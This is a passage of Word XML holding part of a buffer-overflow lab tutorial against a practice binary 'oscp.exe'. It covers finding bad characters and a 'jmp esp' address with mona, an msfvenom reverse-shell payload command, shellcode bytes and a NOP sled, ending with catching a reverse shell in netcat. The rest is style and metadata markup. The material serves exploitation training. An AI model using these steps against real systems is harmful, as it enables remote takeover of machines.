              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Not all of these might be badchars! Sometimes badchars cause the next byte to get corrupted as well, or even effect the rest of the string.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The first badchar in the list should be the null byte (\x00) since we already removed it from the file. Make a note of any others. Generate a new bytearray in mona, specifying these new badchars along with \x00. Then update the payload variable in your exploit.py script and remove the new badchars as well.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Restart oscp.exe in Immunity and run the modified exploit.py script again. Repeat the badchar comparison until the results status returns "Unmodified". This indicates that no more badchars exist.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Finding a Jump Point</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>With the oscp.exe either running or in a crashed state, run the following mona command, making sure to update the -cpb option with all the badchars you identified (including \x00):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="00FF00"/>
          <w:shd w:fill="000000" w:val="clear"/>
        </w:rPr>
        <w:t>!mona jmp -r esp -cpb "\x00"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This command finds all "jmp esp" (or equivalent) instructions with addresses that don't contain any of the badchars specified. The results should display in the "Log data" window (use the Window menu to switch to it if needed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Choose an address and update your exploit.py script, setting the "retn" variable to the address, written backwards (since the system is little endian). For example if the address is \x01\x02\x03\x04 in Immunity, write it as \x04\x03\x02\x01 in your exploit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Generate Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Run the following msfvenom command on Kali, using your Kali VPN IP as the LHOST and updating the -b option with all the badchars you identified (including \x00):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="00FF00"/>
          <w:shd w:fill="000000" w:val="clear"/>
        </w:rPr>
        <w:t>msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "\x00" -f c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Copy the generated C code strings and integrate them into your exploit.py script payload variable using the following notation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>payload = ("\xfc\xbb\xa1\x8a\x96\xa2\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x5d\x62\x14\xa2\x9d"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"\xf7\x04\x44\x8d\x88\xf2\x54\xe4\x8d\xbf\xd2\x15\xfc\xd0\xb6"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:pBdr/>
        <w:shd w:fill="F6F8FA" w:val="clear"/>
        <w:spacing w:lineRule="auto" w:line="348" w:before="0" w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"\x19\x53\xd0\x92\x19\x53\x2e\x1d")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Prepend NOPs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Since an encoder was likely used to generate the payload, you will need some space in memory for the payload to unpack itself. You can do this by setting the padding variable to a string of 16 or more "No Operation" (\x90) bytes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>padding = "\x90" * 16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Exploit!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>With the correct prefix, offset, return address, padding, and payload set, you can now exploit the buffer overflow to get a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Start a netcat listener on your Kali box using the LPORT you specified in the msfvenom command (4444 if you didn't change it).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Restart oscp.exe in Immunity and run the modified exploit.py script again. Your netcat listener should catch a reverse shell!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>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ucida Console">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next w:val="Normal"/>
    <w:uiPriority w:val="0"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>
      <w:kern w:val="2"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="0"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>
      <w:kern w:val="0"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="0"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>
      <w:kern w:val="0"/>
      <w:sz w:val="27"/>
      <w:szCs w:val="27"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="Heading 4"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="0"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="Heading 5"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="0"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="DefaultParagraphFont" w:default="1">
    <w:name w:val="Default Paragraph Font"/>
    <w:uiPriority w:val="0"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="0"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="InternetLink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>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TMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:uiPriority w:val="0"/>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before="0" w:after="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
      <w:color w:val="auto"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>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12">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5bhuv4n35h/buffer_overflow" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Stack_frame" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Exception_handler" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Malloc" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/5bhuv4n35h/buffer_overflow/tree/master/buffer_exploits" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/5bhuv4n35h/buffer_overflow/tree/master/application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LibreOffice/7.2.4.1$Linux_X86_64 LibreOffice_project/20$Build-1</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>9</Pages>
  <Words>2291</Words>
  <Characters>14012</Characters>
  <CharactersWithSpaces>16153</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2020-09-18T02:59:00Z</dcterms:created>
  <dc:creator>PANNA LAL GUPTA</dc:creator>
  <dc:description/>
  <dc:language>en-IN</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-01T13:38:09Z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